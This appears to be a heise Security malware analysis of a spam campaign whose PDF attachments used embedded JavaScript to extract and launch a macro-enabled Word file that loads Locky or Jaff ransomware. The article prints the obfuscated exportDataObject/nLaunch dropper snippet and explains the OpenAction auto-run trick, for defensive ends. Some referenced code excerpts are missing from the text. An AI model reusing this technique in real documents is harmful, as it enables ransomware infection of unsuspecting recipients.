Can ePUBs or PDFs contain viruses?

Analyzed: old scam, new packaging - infection through PDFs

Tampered Word documents are popular with criminals to infect computers with malware. However, the fact that PDF files can also contain executable code has been somewhat forgotten. A recent spam campaign is a good reason to remind yourself of this danger with a fresh sample.

In the recent past, various sources reported increased waves of attacks with prepared PDFs as e-mail attachments. If a victim lets himself be blinded by the mail under Windows and opens the PDF, it catches the blackmail trojan Locky or Jaff via detours. Basically, this route of infection is a well-known scam in a new "packaging". I opened the case and looked at how the malware hit computers.

Fake payment reminder

The subject of this spam mail campaign typically contains the terms "Receipt", "Payment" or "Invoice", followed by any number of digits. The file name takes up this numbering, as the example PDF "001_9018.pdf" examined by me shows. A reader kindly sent me this sample.

For the analysis I use the useful tool PDF Stream Dumper, which was specially developed for the analysis of potentially malicious PDFs. To be on the safe side, I start it in a VM. A quick analysis reveals embedded JavaScript. At first glance, the code looks quite extensive. However, only two functions are performed in total to initiate the malware infection.

The rest of the code is only used for camouflage and comes from an application for managing weather data and a hacker script with the tasteful name "Smack my Bitch up". The relevant code has been distributed to three different places in the 200-line script and looks like this:

function ser2mis () {
return 'exportDataObject';
};

var absheder = ser2mis ();
var firgi = 2;
var WeatherCtrlFocus = this [absheder];

function stdoutS () {
WeatherCtrlFocus ({
cName: "LAMIKSJZ.docm",
nLaunch: firgi
});
};

The awkward spelling obviously serves to further obscure. The whole thing could be reduced to the following:

The function is aimed at the PDF applications Acrobat and Acrobat Reader from Adobe. But other readers also "understand" this command.

Piggyback malware

When it comes to functions, the masterminds behind the PDF campaign adhere to Adobe's requirements for handling JavaScript in PDF applications. The Acrobat JavaScript Scripting Reference documents that the parameter is given the name of the data object to be extracted.

In this case the name is "LAMIKSJZ.docm". This is a Word document with macros. About "" I learn from Adobe's documentation that the extracted Word file is saved in a temporary path and then executed after an Acrobat security warning appears. If you close Acrobat Reader, the temporary copy of the Word file is automatically deleted.

Anyone who is familiar with JavaScript will have noticed that the code execution in our example still requires the function contained in the code to be called. To see where the call to this function is hidden, I use the PDF Stream Dumper to look at the so-called "Catalog Dictionary" of the PDF. Put simply, this describes the structure of the file using the object hierarchy. Here is a relevant excerpt:

.

The dictionary entry is interesting. According to Adobe's description, it can be used to automatically perform an action as soon as a PDF document has been opened. I find the action to be carried out in the form of the "Action Dictionaries" anchored in the PDF. Et voilĂ : This is the call you are looking for:

Nice try ...

Now that it is clear how the trick works with the Word document in the PDF file, I'll run it again in Adobe Reader for the sake of completeness. As expected, the Word document is only extracted and opened in an AppData subfolder of the Windows user after the security notice has been clicked. In the PDF there is also the sentence "Please open attached LAMIKSJZ.docm file", which may seem strange to some recipients due to the file name and the grammar.

In the Word document, everything runs as usual with macro viruses: To activate the VBA code it contains, a victim must first deactivate Word's "Protected View". Then it still has to agree to the execution of macros. Only then is the payload reloaded in the form of Locky and the subsequent infection.

I come to the conclusion that clever social engineering would be required for a successful attack using a PDF-.docm combination. My sample malware clearly lacks that persuasiveness. Basically, the masterminds trip themselves up with the warning in Acrobat Reader, and this additional hurdle could save a victim from infection.

For security reasons, you should not blindly open every PDF received by e-mail: Due to the general possibility of packing executable code in PDFs, you should also be careful with this file format - regardless of which application you are using to open it. (of)

Analyzed - the series on heise Security

As part of the losenheise security series "Analyzes:", experts take a look behind the scenes of current malware, fraudulent schemes or other tricks that are supposed to rob you of your data.

https://heise.de/-3722708Drucken